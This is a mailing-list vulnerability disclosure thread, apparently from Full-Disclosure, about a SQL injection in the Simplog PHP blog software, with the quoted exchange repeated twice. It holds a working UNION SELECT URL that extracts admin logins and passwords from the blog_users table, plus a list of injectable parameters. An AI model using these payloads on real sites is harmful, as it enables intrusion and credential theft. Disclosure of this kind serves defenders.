str0ke ,
looks like i reinvented the wheel :-)) . i didn't make any research. a
friend of mine installed the latest version of this software and voila...
str0ke wrote:
> Javor,
>
> It seems rgod found this vulnerability back in April of 2006.
>
> http://www.milw0rm.com/exploits/1663
>
> <>
> ii)
> http://[target]/[path]/index.php?blogid=[sql]
> http://[target]/[path]/archive.php?blogid=[sql]
> http://[target]/[path]/archive.php?m=[sql]
> http://[target]/[path]/archive.php?y=[sql]
>
> /str0ke
>
> On 1/1/07, Javor Ninov <drfrancky (at) securax (dot) org [email concealed]> wrote:
>> Afected Software:
>> simplog up to 0.9.3.2 (latest version - 12/05/2006 )
>>
>> Site:
>> http://www.simplog.org
>> Simplog provides an easy way for users to add blogging capabilities to
>> their existing websites. Simplog is written in PHP and compatible with
>> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
>> Powerful, yet simple
>>
>> Vulnerability:
>> SQL Injection in archive.php
>> other files probably also affected
>>
>> Example:
>> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20selec
t%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>>
>>
>> Vendor status:
>> NOT NOTIFIED
>>
>>
>> Javor Ninov aka DrFrancky
>> drfrancky shift+2 securax.org
>> http://securitydot.net/
>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
looks like i reinvented the wheel :-)) . i didn't make any research. a
friend of mine installed the latest version of this software and voila...
str0ke wrote:
> Javor,
>
> It seems rgod found this vulnerability back in April of 2006.
>
> http://www.milw0rm.com/exploits/1663
>
> <>
> ii)
> http://[target]/[path]/index.php?blogid=[sql]
> http://[target]/[path]/archive.php?blogid=[sql]
> http://[target]/[path]/archive.php?m=[sql]
> http://[target]/[path]/archive.php?y=[sql]
>
> /str0ke
>
> On 1/1/07, Javor Ninov <drfrancky (at) securax (dot) org [email concealed]> wrote:
>> Afected Software:
>> simplog up to 0.9.3.2 (latest version - 12/05/2006 )
>>
>> Site:
>> http://www.simplog.org
>> Simplog provides an easy way for users to add blogging capabilities to
>> their existing websites. Simplog is written in PHP and compatible with
>> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
>> Powerful, yet simple
>>
>> Vulnerability:
>> SQL Injection in archive.php
>> other files probably also affected
>>
>> Example:
>> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20selec
t%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>>
>>
>> Vendor status:
>> NOT NOTIFIED
>>
>>
>> Javor Ninov aka DrFrancky
>> drfrancky shift+2 securax.org
>> http://securitydot.net/
>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
iD8DBQFFmju0ck4kcwaj+YIRAl6vAJ9L+h9DjA7BdvzzNHZCNuKXKcPH/QCfY2x0
QcGJdC1xyyB6nwcCCxA0HlA=
=ISZ/
-----END PGP SIGNATURE-----
[ reply ]